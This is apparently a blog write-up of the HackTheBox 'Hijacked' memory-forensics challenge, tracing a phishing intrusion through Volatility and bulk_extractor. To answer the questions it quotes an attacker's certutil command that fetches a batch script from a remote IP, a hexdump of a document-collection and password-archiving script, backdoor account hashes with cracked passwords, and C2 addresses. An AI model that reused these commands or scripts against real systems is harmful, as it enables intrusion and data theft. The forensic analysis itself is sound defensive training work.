Case Study 06 - HTB Write-up Hijacked Challenge

- 9 mins read

HackTheBox Hijacked Challenge - Sherlocks forensics

Introduction

In this blog post I will show how I solved the Sherlocks Hijacked challenge in HTB about DFIR1 and memory forensics.
The description of the challenge is the following: Happy Grunwald, the CEO of Forela, decided to expand the company’s business in Lahore, Pakistan, and brought along his IT Administrator, Alonzo Spire, to help set up the new office and ensure the company’s IT infrastructure was running smoothly. However, they faced some challenges due to the language barrier and unreliable power supply in the area. Despite these challenges, they worked closely with local vendors to set up the new office, and Alonzo ensured the IT infrastructure was secure and reliable. They also made an effort to learn about the local culture and customs, which helped them build relationships with the locals. After a few days, Happy received a call from the UK security team, informing him that his workstation had been compromised, despite having received security awareness training and not opening any suspicious emails or links. A memory dump was retrieved and provided to you as the forensic analyst. Your task is to analyze the memory artefact and provide insight into the threat actor who compromised the workstation.

Q&A

Q1

  • What is the PID of the malicious process that gave the threat actor initial access?

    • found the malware with addon malfinder in Volatility3
    • 9620 powershell.exe

Q2

  • There is no evidence of an email client being used. Which application did Happy Grunwald use to read the emails?
    • firefox.exe because its listed in the pslist

Q3

  • Happy told the security team that the email was from a System Administrator, so he immediately opened the attachment. What is the email address that sent the phishing email?
    • extract a dump from firefox process with bulk_extractor it identify some e-mails from the domain (forela.co.uk) since the Happy told its from a system administrator we look for the same domain and we find it was sent from alonzo.spire@forela.co.uk. in the domain.txt we can see that this e-mail is linked to the System Administrator too

Q4

  • What was the subject/topic of the phishing email?
    • Continue with the investigation we filter all e-mails from alonzo.spire@forela.co.uk and we find that the subject is: “Meeting with The New Operations team” in the json.txt extract file with bulk_extractor

Q5

  • Happy was going through a document at the time of the incident. What’s the full path of the document?
    • in the list of process can be seen a docx file opened: C:\Users\happy.grunwald\Documents\C-level\Budget-Plan_Pakistan.docx

Q6

  • What’s the name of the malicious attachment that led to the initial infection?
    • in the list of process there is a peculiar file that is inside the attachments named SystemHealthCheck.zip

Q7

  • Recover the document and find the Topic/heading of the document.
    • using bulk_extractor we could find a zip (docx) in xml, looking closer we can se the title: Budget plan For 2023-Asia Expansion

Q8

  • What’s the expected date of start of business in Pakistan?
    • still in the same XML extracted from docx pid there is a line that explicitly says: The business is expected to be fully under operation by 15 September 2023

Q9

  • The attacker connected to 2 different C2 addresses. What was the C2 IP and port number pair which facilitated initial remote access to the threat actor?
    • this can be found in the powershell full parameter decoded in B64, it has the IP of the server also in the B64. After that just get the netstat of windows and look for the ip to discover the port. The result will be 43.204.228.96:24

Q10

  • The threat actor is known to set up and use Remote Access tools. Which tool did the attacker set up for Persistence?
    • Teamviewer, since it was pretty suspicious it running (?)

Q11

  • What’s the name of the malicious stager file that established C2 communication, giving the attacker a foothold?
    • getting the rar in the temp folder in the process list with pid 6412 we can binwalk and get the offset 3731440 where the zip is and extract it with binwalk and see the name of the content, and it is a SystemHealthCheck.hta

Q12

  • The threat actor created a backdoor user to establish a backup persistence mechanism. What are the credentials of this account?
    • with volatily 3 plugin windows.hashdump.Hashdump can found the following nthash and lmhash and cracked passwords:
    CyberJunkie     1001    aad3b435b51404eeaad3b435b51404ee        64f12cddaa88057e06a81b54e73b949b - Password1
cyberjunkie12   1002    aad3b435b51404eeaad3b435b51404ee        64f12cddaa88057e06a81b54e73b949b - Password1
helpdesk        1003    aad3b435b51404eeaad3b435b51404ee        7e92b8039c9100511e53a53beb2f16b1 - BILA@hud
    its the helpdesk the backup persistence credentials

Q13

  • To bypass email filters the attacker password protected the both of the zip files and provided the passwords to Happy. You are given the malicious attachment, but sadly Happy doesn’t remember the passwords. Recover the passwords and provide them in the order given by the attacker, separated by a comma and a space.
    • with the command: strings -el Dump.mem | less and searching for password key word it possible to find the two password used to encrypt both first and second zip file: forela1234, forela123

Q14

  • Submit the MD5 hash of the stager file you retrieved.
    • retriving the md5 on the hta file dropped is dd46189c153f8e3f4d34868df3f6511f

Q15

  • Which C2 Framework was used by the attacker?
    • Since we have the md5sum of the dropper we can go to virustotal and check the C2 it was detected as, it was the Empire

Q16

  • What is the PID of the process the threat actor abused for privilege escalation?
    • Using volatility 3 we can find the process with the plugin windows.malfind.Malfind so we have:
      4352    svchost.exe     0x169fd150000   0x169fd150fff   VadS    PAGE_EXECUTE_READWRITE  1       1       Disabled        N/A
  43 3a 5c 55 73 65 72 73 5c 68 61 70 70 79 2e 67 C:\Users\happy.g
  72 75 6e 77 61 6c 64 5c 41 70 70 44 61 74 61 5c runwald\AppData\
  4c 6f 63 61 6c 5c 54 65 6d 70 5c 57 69 6e 73 72 Local\Temp\Winsr
  76 63 2e 64 6c 6c 00 00 00 00 00 00 00 00 00 00 vc.dll..........
    • The pid is 4352

Q17

  • What is the path of the malicious file that resulted in privilege escalation?
    • we can see above already have this path, so its C:\Users\happy.grunwald\AppData\Local\Temp\Winsrvc.dll

Q18

  • What is the Mitre sub-technique ID with which the attacker escalated their privileges?
    • T1055.001 = Dynamic-link Library Injection -> Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.

Q19

  • Hunt for the second C2 Address to which connection was made by a LOLBIN after escalating privileges.
    • using wireshark with pcap captured with bulk_extractor we can see a very interesting remote port 4444 besides the other C2 that uses 42 the ip related to port 4444 is 13.233.33.88, that is also a AWS ip used at the first C2 communication, so it is 13.233.33.88:4444

Q20

  • The attacker directly downloaded a script from a web server. What is the full URL from where it was downloaded?
    • Looking at the strings in the dump we can find a interesting command: certutil -urlcache -f http://13.127.18.201/SystemIntegrityCheck.bat %TEMP%\SystemIntegrityCheck.bat
    • So its the .bat url

Q21

  • The threat actor archived the collected data using tools like WinRAR, RAR, etc., before exfiltrating it. What is the password with which the TA archived the collected data?
    • we can get this info on the dump of the file in the explorer process running:
    000001b0: 5b01 0000 1800 0000 0d0a 7365 7420 2273  [.........set "s
000001c0: 6f75 7263 653d 2575 7365 7270 726f 6669  ource=%userprofi
000001d0: 6c65 2522 0d0a 7365 7420 2264 6573 7469  le%"..set "desti
000001e0: 6e61 7469 6f6e 3d25 7465 6d70 255c 4c6f  nation=%temp%\Lo
000001f0: 6f74 446f 6373 220d 0a0d 0a23 504b 2d4f  otDocs"....#PK-O
00000200: 5052 3234 0d0a 0d0a 6966 206e 6f74 2065  PR24....if not e
00000210: 7869 7374 2022 2564 6573 7469 6e61 7469  xist "%destinati
00000220: 6f6e 2522 206d 6b64 6972 2022 2564 6573  on%" mkdir "%des
00000230: 7469 6e61 7469 6f6e 2522 0d0a 0d0a 666f  tination%"....fo
00000240: 7220 2f72 2022 2573 6f75 7263 6525 2220  r /r "%source%" 
00000250: 2525 6120 696e 2028 2a2e 646f 6378 202a  %%a in (*.docx *
00000260: 2e64 6f63 6d20 2a2e 7064 6620 2a2e 786c  .docm *.pdf *.xl
00000270: 7320 2a2e 7478 7420 2a2e 7070 7420 2a2e  s *.txt *.ppt *.
00000280: 786c 7378 202a 2e70 7074 7829 2064 6f20  xlsx *.pptx) do 
00000290: 280d 0a20 2020 2063 6f70 7920 2225 2561  (..    copy "%%a
000002a0: 2220 2225 6465 7374 696e 6174 696f 6e25  " "%destination%
000002b0: 220d 0a29 0d0a 0d0a 6364 2025 5445 4d50  "..)....cd %TEMP
000002c0: 255c 4c6f 6f74 446f 6373 0d0a 2243 3a5c  %\LootDocs.."C:\
000002d0: 5072 6f67 7261 6d20 4669 6c65 735c 5769  Program Files\Wi
000002e0: 6e52 4152 5c52 6172 2e65 7865 2220 6120  nRAR\Rar.exe" a 
000002f0: 4461 7461 202d 7020 7277 616a 6e6b 6867  Data -p rwajnkhg
00000300: 6264 7479 616c 6d64 0d0a 0d0a 0d0a 7061  bdtyalmd......pa
00000310: 7573 6500 0000 0000 ffff ffff 8279 4711  use..........yG.
    • so the password is rwajnkhgbdtyalmd

Q22

  • The threat actor that performed the attack is known for automating the collection of documents and files from compromised systems. The threat actor named their operation against Forela “PK-OPR24.” Our reverse engineer said that she found this string commented on multiple occurrences in the analysis of the malicious stager. Reverse the script and provide the file extensions that it collects, in the order they are presented in the code.

    • Again in the dump above we can see the file types it try to get and it is:
      .docx, .docm, .pdf, .xls, .txt, .ppt, .xlsx, .pptx

Q23

  • What Threat Actor seems to be in question? External Research is required, so keep in mind things like some of the techniques you identified so far, the Region in which they operate, etc.

    • search in the mitre framework website, getting the pakistan keyword and matching the way the attacker infiltrate and exfiltrate de data we can come to conclusion it is the Mustang Panda

Conclusion

This investigation demonstrated the critical role of memory forensics in incident response. Using Volatility 3 and bulk_extractor, we reconstructed a complete attack chain from a single memory dump, identifying the initial phishing vector, malicious processes, C2 communications, privilege escalation techniques, and data exfiltration methods. The challenge highlighted how social engineering combined with advanced hacking skills (multiple C2 servers, Empire framework, automated data collection) can compromise even the most security-aware organizations. A effective DFIR requires both technical tool proficiency and analytical thinking to correlate artifacts and timeline events, prove to be the best skills to have under your belt against even some advanced hacking skills.

“You can erase files, but you can’t erase activity.”

  1. Digital Forensics and Incident Response ↩︎